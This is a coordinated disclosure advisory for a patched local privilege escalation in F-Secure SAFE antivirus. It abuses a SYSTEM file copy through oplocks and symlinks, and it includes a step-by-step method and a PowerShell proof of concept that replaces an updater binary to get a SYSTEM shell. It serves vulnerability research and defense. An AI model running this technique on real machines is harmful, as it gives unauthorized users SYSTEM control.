F-Secure SAFE arbitrary file copy Elevation of Privilege

Published on Wed 20 March 2019 by @clavoillotte

Product: F-Secure SAFE Antivirus (also affected CS and PSB Computer Protection)

Type: Local Privilege Escalation

Summary: A privileged file copy performed by SAFE when an infected file is detected can be abused to overwrite an arbitrary file. This can be used by an unprivileged user to obtain SYSTEM privileges on the local machine.

This vulnerability is patched, and the update should be applied automatically deployed to clients.

Description

When an infected file is detected, SAFE will attempt to delete it. The first attempt will impersonate the unprivileged user account; if the file is not removed it will retry without impersonation, and make a temporary copy of the file. These operations will be performed by a privileged process running as SYSTEM (fshoster64.exe).

The operations performed (that are relevant for this vulnerability) can be summarized as follow:

  1. Check infected_file.exe properties (and its parent directories’), impersonating user (no more impersonation from this point forward)
  2. Log stuff in C:\ProgramData\F-Secure\Log\FSAV\Users\removal.log (or path in UssRemovalLogger registry key)
  3. Read infected_file.exe content & properties
  4. (Do some other operations for ~1 minute)
  5. Read infected_file.exe content & properties
  6. Log stuff in C:\ProgramData\F-Secure\Log\FSAV\Users\removal.log again
  7. Copy infected_file.exe to infected_file.exe.uss_dis in the same directory
  8. Read infected_file.exe / infected_file.exe.uss_dis content & properties
  9. Remove infected_file.exe.uss_dis
  10. Remove infected_file.exe

A general explanation on privileged file operation bugs is available here.

This behavior can be abused by an unprivileged user to create, overwrite or delete arbitrary files with SYSTEM privileges. Indeed, the user can replace the files (infected and copy) by pseudo-symbolic links to arbitrary files just before the copy operation (after step 6, before step 7) so that the copy operation overwrites an arbitrary file – and then change the link before the delete operation (step 9) to prevent removal.

As an example, to overwrite C:\Path\target.exe with the content of C:\Path2\source.exe, an unprivileged user can:

  • Create directory C:\Windows\Temp\Test
  • Create the EICAR file named C:\Windows\Temp\Test\eicar.txt
  • Wait a bit for the first entry to removal.log to be created
  • Place an oplock #1 on removal.log to let other operations take place up to step 6 and block the thread
  • Oplock #1 triggers
  • Replace C:\Windows\Temp\Test\eicar.txt by a symlink to C:\Path2\source.exe
  • Create a symlink C:\Windows\Temp\Test\eicar.txt.uss_dis resolving to C:\Path\target.exe
  • Place an oplock #2 on C:\Path\target.exe
  • Release oplock #1
  • SAFE copies eicar.txt to eicar.txt.uss_dis, which actually means source.exe is copied to target.exe
  • Oplock #2 triggers
  • Change symlink C:\Windows\Temp\Test\eicar.txt.uss_dis to resolve to to a non-existent file
  • Release Oplock #2
  • SAFE attempts to delete eicar.txt.uss_dis, deletion fails
  • SAFE deletes eicar.txt (i.e. source.exe)

So target.exe is overwritten with the content of source.exe (with SYSTEM privileges).

Proof of Concept

The following PowerShell code (and tools from the symboliclink-testing-tools toolkit) can be used to perform the above.

You’ll need 2 PowerShell consoles. On the first console, enter:

PS C:\> New-Item -Type Directory -Force C:\Windows\Temp\Test
PS C:\> 'X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*' | Out-File -encoding ascii -FilePath C:\Windows\Temp\Test\eicar.txt -NoNewline
PS C:\> Sleep 5
PS C:\> path\to\SetOpLock.exe C:\ProgramData\F-Secure\Log\FSAV\Users\removal.log

Wait for the Oplock to trigger (1-2 minutes in my tests), then on the second console, enter:

PS C:\> Remove-Item -Recurse -Force C:\Windows\Temp\Test
PS C:\> path\to \CreateSymlink.exe -p C:\Windows\Temp\Test\eicar.txt path\to\GetSystemShell.exe
PS C:\> path\to \BaitAndSwitch.exe C:\Windows\Temp\Test\eicar.txt.uss_dis "C:\Program Files (x86)\F-Secure\SAFE\apps\Ultralight\ulu\1527152256\ulu_handler.exe" C:\Windows\Temp\dummy.txt

The following video shows this PoC used to replace a SAFE updater binary C:\Program Files (x86)\F-Secure\SAFE\apps\Ultralight\ulu\1527152256\ulu_handler.exe with a program that pops up a SYSTEM shell:

Fix

The vendor has released a patch through update channels that should have been deployed automatically on affected systems.

References

No CVE or vendor advisory was issued.

Timeline

2018-07-10: Initial report sent to vendor

2018-07-11: Vendor acknowledges reception of report

2018-07-30: Vendor confirms a fix is in progress

2018-07-30: Information request sent to vendor regarding other impacted product

2018-07-30: Vendor acknowledges the request

2018-08-07: Vendor releases updates through auto-update channels

2018-08-09: Vendor response confirming the fix and the other impacted products, asking for test of the fix

2018-08-09: Mail sent to vendor confirming the fix

2018-08-21: Mail from vendor informing the bug has been granted a reward through their VRP

2019-03-20: Publication of this advisory